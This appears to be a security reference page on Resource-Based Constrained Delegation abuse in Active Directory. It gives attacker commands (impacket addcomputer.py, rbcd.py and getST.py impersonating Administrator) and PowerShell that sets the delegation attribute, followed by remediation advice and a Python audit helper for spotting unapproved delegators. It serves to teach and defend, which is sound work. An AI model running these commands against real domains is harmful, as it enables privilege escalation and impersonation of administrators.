Resource-Based Constrained Delegation (RBCD)
Description
RBCD lets the target resource specify who can delegate to it by controlling the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If attackers gain write access to this attribute on a server/computer object (via GenericWrite, WriteDACL, or mis-scoped groups), they can grant a machine they control the right to impersonate any user (including domain admins) to that resource. This is commonly abused in combination with LDAP write primitives (e.g., relayed connections) to persist access.
Examples
Granting RBCD via Write Access
Create or use a controlled computer account and grant it RBCD on a target server:
# Create a machine account the attacker controls
addcomputer.py -dc-ip 10.0.0.10 corp.local/attacker:'Passw0rd!' -computer-name 'WS01$' -computer-pass 'P@ssw0rd123!'
# Grant RBCD (delegate-from WS01 to target SERVER01)
rbcd.py -dc-ip 10.0.0.10 -t SERVER01$ -f WS01$ corp.local/attacker:'Passw0rd!'
Impersonate a Privileged User to the Target Service
Request a service ticket as Administrator to an SPN on the target:
getST.py -dc-ip 10.0.0.10 -spn cifs/SERVER01.corp.local -impersonate Administrator corp.local/WS01$:'P@ssw0rd123!'
export KRB5CCNAME=Administrator.ccache
Use the ticket to access the service (e.g., SMB on SERVER01).
Set RBCD with PowerShell (ACL write)
If you have rights to modify the target computer object ACL, you can set the RBCD SDDL directly:
$Sid = (Get-ADComputer WS01).SID
$Sd = New-Object System.Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;FA;;;$Sid)"
$Bytes = [byte[]]::new($Sd.BinaryLength)
$Sd.GetBinaryForm($Bytes, 0)   # GetBinaryForm returns void; it fills $Bytes in place
# -Replace rather than -Add: the attribute is single-valued, so -Add fails if a descriptor is already set
Set-ADComputer SERVER01 -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$Bytes}
Remediation
- Lock down delegation attributes
  - Only the computer account itself and Tier-0 admins should be able to write msDS-AllowedToActOnBehalfOfOtherIdentity.
  - Remove orphaned ACEs left by decommissioned tooling.
- Prefer ephemeral access over persistent delegation
  - Replace broad write permissions with JEA/JIT models and Privileged Access Workstations.
- Monitor and respond
  - Alert on modifications to the RBCD attribute and on the sudden ability of new principals to delegate to a resource.
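As an added audit example (not part of the original page), the Python below decodes the binary msDS-AllowedToActOnBehalfOfOtherIdentity value as returned over LDAP and lists every SID allowed to act on behalf of the computer, so the result can be compared against an approved allowlist during the review the remediation points call for. The function names, the descriptor builder and the SIDs are all constructed for this example.

```python
import struct

# Audit helper (added example, not from the page): decode the self-relative NT
# security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity and list
# every SID holding an ACCESS_ALLOWED ACE, i.e. every principal able to delegate here.

def sid_to_str(buf, off):
    """Decode a binary SID at buf[off:]; return (sid_string, byte_length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), 8 + 4 * count

def str_to_sid(s):
    """Encode 'S-1-5-...' as a binary SID (used only to build constructed sample data)."""
    rev, authority, *subs = (int(x) for x in s.split("-")[1:])
    return bytes([rev, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def allowed_to_act(sd):
    """Return SIDs granted by ACCESS_ALLOWED ACEs (type 0) in the descriptor's DACL."""
    _rev, _sbz, _ctrl, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if dacl_off == 0:                      # no DACL present: nobody is allowed to act
        return []
    _arev, _asbz, _asize, ace_count, _asbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0:                  # ACCESS_ALLOWED_ACE: mask at off+4, SID at off+8
            sids.append(sid_to_str(sd, off + 8)[0])
        off += ace_size                    # ace_size lets us skip deny/object ACEs safely
    return sids

def build_rbcd_descriptor(sids):
    """Constructed sample value with the same shape as O:BAD:(A;;FA;;;<sid>) per SID."""
    aces = b""
    for s in sids:
        sid = str_to_sid(s)
        aces += struct.pack("<BBHI", 0, 0, 8 + len(sid), 0x1F01FF) + sid   # FA = 0x1F01FF
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    owner = str_to_sid("S-1-5-32-544")     # BA = BUILTIN\Administrators
    # header: revision 1, control SE_DACL_PRESENT|SE_SELF_RELATIVE, DACL at 20, owner after it
    hdr = struct.pack("<BBHIIII", 1, 0, 0x8004, 20 + len(dacl), 0, 0, 20)
    return hdr + dacl + owner

def unexpected_delegators(sd, allowlist):
    """Flag principals allowed to act that are not on the approved allowlist."""
    return [s for s in allowed_to_act(sd) if s not in allowlist]
```

Feed `allowed_to_act` the raw attribute bytes from an LDAP query of every computer with the attribute populated; any SID that `unexpected_delegators` returns is a delegation grant nobody approved.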